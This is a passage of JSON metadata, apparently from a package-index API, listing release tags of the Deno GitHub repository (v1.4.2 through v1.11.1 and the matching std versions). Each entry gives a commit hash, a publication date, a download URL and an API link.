-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecos